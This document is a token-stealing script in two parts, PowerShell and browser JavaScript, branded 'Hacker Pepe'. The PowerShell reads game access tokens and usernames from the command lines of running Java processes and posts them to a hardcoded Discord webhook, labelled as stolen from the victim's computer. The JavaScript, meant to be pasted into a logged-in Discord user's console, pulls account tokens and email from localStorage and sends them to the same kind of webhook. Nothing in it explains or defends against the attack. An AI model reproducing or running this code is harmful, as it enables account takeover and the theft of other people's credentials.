$webhookUrl = "https://discord.com/api/webhooks/1490629749159104532/wFu6BV4lrg8HHuNzi10Ii4pMXYkJx0_xDuk5NnOgVDoPvJqwAoPsesebgGKOIm2WZ6Oc"

Get-CimInstance -Query "SELECT CommandLine FROM Win32_Process WHERE Name LIKE 'Java%' AND CommandLine LIKE '%accessToken%'" | 
Select-Object -ExpandProperty CommandLine | 
ForEach-Object {
 $accessToken = $null
 $username = $null

 if ($_ -match '--accessToken\s+(\S+)') {
 $accessToken = $matches[1]
 }
 if ($_ -match '--username\s+(\S+)') {
 $username = $matches[1]
 }

 if ($accessToken -and $username) {
 # Format the message for Discord
 $message = @"
 > AccessToken: $accessToken 
 > Username: $username 
"@

 Write-Output $message

 # Properly format the payload for Discord
 $payload = @{
 content = "New Access Token Found!"
 embeds = @(
 @{
 title = "Discord Token"
 description = "Stolen from: $($env:COMPUTERNAME)"
 fields = @(
 @{
 name  = "Access Token"
 value = "$($message)"
 inline= $false
 }
 )
 }
 )
 } | ConvertTo-Json -Depth 10

 # Send the payload to the Discord webhook
 Invoke-RestMethod -Uri $webhookUrl -Method Post -ContentType "application/json" -Body ($payload)
 }
}

# JavaScript Payload (to be executed in browser console of logged-in Discord user)
const localStorage = document.body.appendChild(document.createElement("iframe")).contentWindow.localStorage;
const tokens = JSON.parse(localStorage.tokens);
const email = localStorage.email_cache.slice(1, -1);
const users = JSON.parse(localStorage.MultiAccountStore)._state.users;

for (const [userId, token] of Object.entries(tokens)) {
 let avatar ="https://discord.com/assets/1f0bfc0865d324c2587920a7d80c609b.png";
 let username ="@user#1234";

 const images =document.querySelectorAll("img");
 
 for (let i=0; i<images.length; i++) {
 if(images[i].src.includes(userId)) {avatar=images[i].src.split("?").join(""); break;}
 }

 for (let i=0; i<users.length; i++) {
 const user=users[0];
 
 if(user.id==userId) {avatar=`https://cdn.discordapp.com/avatars/${userId}/${user.avatar}.webp`; username=`@${user.username}#${user.discriminator}`; break;}
 }

 
  
  const script=`fetch("${webhookUrl}",{method:"POST",headers:{'Content-Type':'application/json'},body:JSON.stringify({content:null,embeds:[{title:'Successfully Grabbed Token!',color:2067276,fields:[{name:'User',value:`<@!${userId}>`,inline:true},{name:'Email',value:`${email}`,inline:true},{name:'Token',value:`${token}`}],author:{name:`${username}`,url:'https://gist.github.com/subreme',icon_url:`${avatar}`},footer:{text:'Hacker Pepe v2.0.0',icon_url:'https://imgur.com/5Ri5eok.png'}}],username:'Hacker Pepe',avatar_url:'https://imgur.com/5Ri5eok.png'})}).then(()=>{window.location='https://discord.com/'})`;
  
  url=`https://htmlpreview.github.io/?data:text/html,<script>${encodeURIComponent(script)}</script>`;
  
  let popup=window.open(url,"","height=100,width=100");
  
  setInterval(()=>{
 if(popup.window.location.href=='https://discord.com/') {popup.close();}
  },1000);
}
